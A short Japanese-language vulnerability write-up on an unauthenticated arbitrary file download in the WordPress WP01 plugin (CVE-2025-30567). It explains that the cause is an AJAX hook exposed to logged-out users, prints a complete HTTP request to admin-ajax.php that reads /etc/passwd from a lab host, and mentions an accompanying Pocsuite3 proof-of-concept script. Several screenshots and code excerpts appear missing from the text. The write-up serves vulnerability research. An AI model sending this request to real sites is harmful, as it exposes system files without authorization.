
WordPress WP01 における未承認の任意ファイルダウンロード
WordPress WP01 における無許可の任意ファイルダウンロード!
ステップ 1: WP01 プラグインをダウンロードしますが…

はは、心配しないでください。プラグインのソースコードはこちらです。
ステップ 2: 提供された wp01 フォルダをパッケージ化し、WordPress のプラグインセクションにアップロードします。このように→

単純です — 脆弱性は次の箇所でトリガーされます:

次に、make_archive メソッドが呼び出されている場所を確認します。

2つの AJAX アクションフックがあります — ログインユーザー用と非ログインユーザー用です。これが無許可アクセス脆弱性の理由です。
では、ローカルマシンの /etc/passwd の内容を読み取るためのペイロードを作成しましょう。
POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1
Host: 192.168.43.133
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cb_lang=zh-cn; PHPSESSID=8b29e9ec5200189ba7e72e98d4c6d017; WS_ADMIN_URL=ws://192.168.43.133/notice; WS_CHAT_URL=ws://192.168.43.133/msg; wordpress_test_cookie=WP%20Cookie%20check; XDEBUG_SESSION=PHPSTORM; wp01-lang=en; wp_lang=en_US
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
target=passwd&path=/etc/
結果:


OK、次に、この wp-01-passwd.zip ファイルをダウンロードします。

Pocsuite3 に基づいて書かれています。詳細は Poc_CVE-2025-30567.py を参照してください。
